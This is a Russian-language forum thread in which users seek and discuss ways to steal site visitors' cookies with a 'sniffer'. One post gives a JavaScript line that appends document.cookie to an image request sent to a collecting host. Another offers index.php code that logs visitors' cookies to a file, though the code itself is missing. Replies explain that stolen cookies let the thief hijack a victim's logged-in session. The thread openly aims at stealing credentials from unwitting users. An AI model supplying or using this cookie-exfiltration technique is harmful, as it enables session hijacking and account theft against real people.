![]() |
Есть ли скрипт такого типа:
Ко мне заходят на сайт и index.php сам крадет И в итоге ко мне на Сниффер приходят Куки со всех сайтов Разумеется там оно не слишком быстро прийдут!! Есть ли такое ?* |
Глупый вопрос конечно нет
|
Вот не пойму я Сделал вот открываю в Браузере
img = new Image(); img.src = "http://10.0.14.197/images/123_1.gif?"+document.cookie; Потом в Итоге меня пере брасывает на Яндекс в чем проблема ?? Добавлено через 5 минут ЗЫ пользывался Своим Сниффером!!! |
дай ссыль куда бросает!
|
|
можно в файле index.php в конце кода дописать код снифера...
пользователи которые зайдут на твою индексовую страничку, сниф автоматически словит их куки... это делается очень просто если интересно... я напишу код, мне не трудно.(может комуто пригодиться) создай в корне с индексовой страничкой фаил log.txt Открывай файла index.php в блокноте и дописывай в конце code: |
а для чего красть Cookies
объясните ? я в этом не понимаю тем более на сайте ? |
Если бы небыло Куков то ты бы после каждого Клика по сайту Должен будешь снова и Снова вводить Пасс и Лог
|
Цитата:
Сообщение от morgan-id а для чего красть Cookies объясните ? я в этом не понимаю тем более на сайте ? Воруя кукисы ты крадешь ссесию жертвы...благодаря чему сможешь находиться на сайте жертвы пока она не нажмет выход, тем самым прекратив их действие. |
| Время: 00:37 |